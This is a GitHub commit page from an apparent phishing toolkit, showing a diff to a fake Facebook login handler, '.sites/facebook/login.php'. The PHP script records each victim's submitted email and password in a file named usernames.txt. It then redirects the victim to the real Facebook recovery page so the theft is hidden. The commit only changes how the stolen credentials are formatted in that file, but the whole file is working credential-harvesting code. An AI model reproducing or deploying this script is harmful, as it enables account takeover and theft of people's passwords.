Skip to content

Commit

Permalink
Minor Issue on "Facebook/login.php"
Browse files Browse the repository at this point in the history
Graphical shell error for facebook login htr-tech#457
  • Loading branch information
htr-tech authored Mar 9, 2022
2 parents e9b4c48 + 397f8a8 commit e159dae
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions .sites/facebook/login.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
<?php
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
header('Location: https://facebook.com/recover/initiate/');
exit();
?>
?>

0 comments on commit e159dae

Please sign in to comment.